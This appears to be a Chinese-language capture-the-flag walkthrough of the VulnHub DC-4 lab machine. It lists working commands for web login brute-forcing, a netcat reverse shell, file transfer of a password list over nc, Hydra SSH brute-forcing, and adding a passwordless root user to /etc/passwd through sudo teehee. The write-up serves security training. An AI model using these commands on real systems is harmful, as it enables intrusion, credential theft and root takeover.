- 主機資訊
- 實驗過程
詳情介紹請參考下載地址
任務目標:拿下系統的root賬戶
靶機下載地址:https://www.vulnhub.com/entry/dc-4,313/
主機資訊
DC4:192.168.75.151
Kali:192.168.75.150
實驗過程
先發現內網存活主機
arp-scan --interface eth0 192.168.75.1/24
然後檢視靶機開放的埠
nmap -A -p- -T4 -v 192.168.75.151
訪問80,是一個登入頁面
既然遇到登入頁面,那就可以嘗試看看,是否有弱口令
透過Bp爆破
- 使用者名稱:admin
- 密碼:happy
登進後臺
毫無疑問,肯定點選“Command”,發現可以執行一些命令
透過Bp抓取資料包並修改命令,發現修改後的命令可以執行
這裡我直接反彈Shell
nc -e /bin/bash 192.168.75.150 8888
shell建立成功升級為互動式shell
python -c 'import pty;pty.spawn("/bin/bash")'
cd /home
發現三個賬號的家:charles、jim、sam
最終在jim的家中發現了一個老密碼的檔案
將這些密碼儲存下來並對jim進行ssh爆破,因為在資訊蒐集階段我們可以看到靶機是開放了22埠
這裡可以用nc進行檔案傳輸
# Kali
nc -nvlp 5555 > old-passwords.txt
# DC4
nc 192.168.75.150 5555 < /home/jim/backups/old-passwords.bak
現在用hydra對jim賬號進行SSH爆破
hydra -l jim -P /root/old-passwords.txt ssh://192.168.75.151
透過ssh連線到靶機,執行如下命令:
登入提示:You have mail.
找到了一封root寫給jim的郵件
去/var/mail再看看有沒有其他有意思的資訊,找到了一封charles寫給jim的郵件,並且看到了charles的賬戶密碼
這封郵件來得非常妙,是charles寫給jim的。因為charles要出去度假了,所以老闆叫charles把自己的密碼^xHhA&hvim0y給jim。So直接用郵箱傳遞密碼是非常不安全的。
那麼我們切換到charles
首先發現jim不能使用sudo許可權,難怪靶機還給了我們charles的賬戶,發現charles可以使用/usr/bin/teehee,並且不需要使用root密碼
可以看到使用teehee提權,teehee就是tee的變體從標準輸入讀取並寫入標準輸出和檔案
我們可以藉助teehee往passwd寫入一個root賬號即可得到root許可權
檢視一下這個命令的幫助手冊,使用-a引數在/etc/passwd檔案裡面新建一個有管理員許可權的使用者
首先來了解一下/etc/passwd的格式
echo "NoCirc1e::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
切換使用者即可提權成功,並讀取flag